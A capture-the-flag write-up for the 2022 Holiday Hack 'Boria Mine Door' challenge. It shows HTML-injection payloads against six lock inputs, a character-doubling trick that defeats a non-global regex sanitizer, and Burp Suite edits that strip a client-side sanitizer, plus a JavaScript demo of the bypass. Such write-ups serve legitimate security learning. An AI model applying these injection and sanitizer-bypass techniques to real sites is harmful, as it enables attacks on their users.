Open Boria Mine Door
Hal Tandybuck is trying to open that door and asking you for help.
Challenge

Open the door to the Boria Mines. Help Alabaster Snowball in the Web Ring to get some hints for this challenge.

Open_Boria_Mine_Door_1.png

Open_Boria_Mine_Door_2.png

Solution

The lock window is an iframe, so let's just right-click -> Show frame source on it to find out where it is served from: https://hhc22-novel.kringlecon.com. The interesting parts are:

...
        <div class="iframes">
            <iframe src='/pin1' class='pin1'></iframe>
            <iframe src='/pin2' class='pin2'></iframe>
            <iframe src='/pin3' class='pin3'></iframe>
            <iframe src='/pin6' class='pin6'></iframe>
            <iframe src='/pin5' class='pin5'></iframe>
            <iframe src='/pin4' class='pin4'></iframe>
...
    <script src="conduit.js"></script>
    <script src="app.js"></script>
...

Pin1

Let's look at the source for Pin1:

   <form method='post' action='pin1'>
        <!-- @&@&&W&&W&&&& -->
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
        <button>GO</button>

Why not just try the string from that HTML comment? Indeed, it unlocks the first pin.

Pin2

Let's look at the source for Pin2:

    <form method='post' action='pin2'>
        <!-- TODO: FILTER OUT HTML FROM USER INPUT -->
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
        <button>GO</button>

The two endpoints sit on different rows, so we need line breaks. The comment tells us HTML is not filtered, so we can mix HTML <br> tags with Unicode box-drawing characters to draw the connecting line:

█──╮─────────
───╰──╮──────
──────╰─────█
resulting in 
<br>█──╮─────────<br>───╰──╮──────<br>──────╰─────█

Pin3

Let's look at the source for Pin3:

    <form method='post' action='pin3'>
        <!-- TODO: FILTER OUT JAVASCRIPT FROM USER INPUT -->
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
        <button>GO</button>

Presumably the same technique works here as well. The first attempt didn't, though: it seems the colour has to match the endpoints too, so we wrap the pattern in a <font color> tag (the comment talks about filtering JavaScript, but we don't need any):

──────╭─────█
──╭───╯──────
█─╯──────────
resulting in 
<font color="blue">──────╭─────█<br>──╭───╯──────<br>█─╯──────────</font>

With the first three pins open, the gate unlocks.

We get following hints:

Significant CASE

Early parts of this challenge can be solved by focusing on Glamtariel's WORDS.

Another hint should be available if the remaining locks are also solved, so let's carry on.

Pin4

Let's look for the source of Pin4:

...
    <script>
        const sanitizeInput = () => {
            const input = document.querySelector('.inputTxt');
            const content = input.value;
            input.value = content
                .replace(/"/, '')
                .replace(/'/, '')
                .replace(/</, '')
                .replace(/>/, '');
        }
    </script>
...
    <form method='post' action='pin4'>
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' onblur='sanitizeInput()' />
        <button>GO</button>
    </form>

This time the pattern is slightly different, and a sanitizer is attached to the input's onblur handler. Note that every .replace() uses a regex without the g flag, so each call strips only the first occurrence of its character. We can therefore simply "duplicate" the first ", < and > so that one copy of each survives the sanitizer:

o
█───────────█
█───────────█
█───────────█
resulting in 
o █───────────█ █───────────█ <<font color=""blue">>█───────────█</font>

Pin5

Let's look for the source of Pin5:

...
    <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-inline'; style-src 'self'">
...
    <script>
        const sanitizeInput = () => {
            const input = document.querySelector('.inputTxt');
            const content = input.value;
            input.value = content
                .replace(/"/gi, '')
                .replace(/'/gi, '')
                .replace(/</gi, '')
                .replace(/>/gi, '');
        }
    </script>
...
    <form method='post' action='pin5'>
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' onblur='sanitizeInput()' />
        <button>GO</button>

Okay, this time the regexes carry the g flag and the sanitizer catches all occurrences, so doubling characters no longer helps. Since the sanitizer only runs in the browser (onblur), it is easier to "tweak" the client-side code than to outsmart it. We open Burp Suite and use the built-in proxy: submit any character in the text field while intercept is on, select Action -> Do intercept -> Response to this request, and edit the sanitizer out of the returned page before it reaches the browser.
Afterwards we'll submit:

o
█─╭─────────█
█╭╯────╭────█
█╯╭────╯───█
█─│
resulting in
o <font color="red">█─╭─────────█</font> <font color="red">█╭╯──</font><font color="blue">──╭────█</font> <font color="red">█╯</font><font color="blue">╭────╯───█ █─│</font>
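The following is an added example, not code from the challenge or the writeup author. It re-implements the two onblur sanitizers from /pin4 and /pin5 as plain functions (regexes copied from the <script> blocks above; the function names sanitizePin4, sanitizePin5, doubleFirst and buildPostBody are this example's own) so the difference between a non-global and a global replace, and why the doubling trick only works for Pin4, can be checked offline. It also shows that the server only ever sees the raw POST body, which is what the proxy edit above exploits.

```javascript
// Added example (not the challenge's code). Regexes copied from /pin4 and /pin5.

// /pin4: no 'g' flag, so each replace() removes only the FIRST match.
function sanitizePin4(content) {
  return content
    .replace(/"/, '')
    .replace(/'/, '')
    .replace(/</, '')
    .replace(/>/, '');
}

// /pin5: 'g' flag, so every occurrence is removed ('i' changes nothing here).
function sanitizePin5(content) {
  return content
    .replace(/"/gi, '')
    .replace(/'/gi, '')
    .replace(/</gi, '')
    .replace(/>/gi, '');
}

// Bypass for the /pin4 sanitizer: insert a second copy directly in front of the
// first occurrence of each stripped character. The sanitizer then eats the
// duplicate and leaves the original payload intact.
function doubleFirst(payload) {
  let out = payload;
  for (const ch of ['"', "'", '<', '>']) {
    const i = out.indexOf(ch);
    if (i !== -1) out = out.slice(0, i) + ch + out.slice(i);
  }
  return out;
}

// What the browser (or Burp, or curl) actually sends to POST /pinN: just an
// application/x-www-form-urlencoded body. The onblur sanitizer is not part of
// this path, which is why editing it out of the page bypasses it entirely.
function buildPostBody(payload) {
  return new URLSearchParams({ inputTxt: payload }).toString();
}

// Demonstration on the Pin3-style pattern (constructed sample input).
const pattern = '<font color="blue">──────╭─────█<br>──╭───╯──────<br>█─╯──────────</font>';
const doubled = doubleFirst(pattern);
console.log('payload sent to /pin4 :', doubled);
console.log('after pin4 sanitizer   :', sanitizePin4(doubled)); // original restored
console.log('after pin5 sanitizer   :', sanitizePin5(doubled)); // all markup gone
console.log('raw POST body          :', buildPostBody(pattern));
```

The doubling trick is exact: for any payload, sanitizePin4(doubleFirst(payload)) returns the payload unchanged, because each replace() removes exactly one of the two adjacent identical characters. Against sanitizePin5 the same input loses every quote and angle bracket, so the only option left is to keep the sanitizer from running at all.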

Pin6

Let's look for the source of Pin6:

...
    <meta http-equiv="Content-Security-Policy" content="script-src 'self'; style-src 'self'">
...
    <form method='post' action='pin6'>
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
        <button>GO</button>
    </form>

No sanitization in place? Note the CSP, though: script-src 'self'; style-src 'self' blocks inline scripts and inline styles (a <style> block or a style attribute), but a <font color="..."> attribute is plain HTML rather than CSS and is not affected. So let's just submit a proper pattern :-)

█───────────█
█─────────╮─█
█─╮───────╰─█
█─╰──────╮──█
█────────┃
resulting in 
<font color="lime">█───────────█</font> <font color="red">█─────────╮─█</font> <font color="blue">█─╮───────</font><font color="red">╰─█</font> <font color="blue">█─╰──────╮──█ █────────┃</font>

The final solution looks like this:

2022_Open_Moria_Mine_Door.png

We get following hints:

eXternal Entities

Sometimes we can hit web pages with XXE when they aren't expecting it!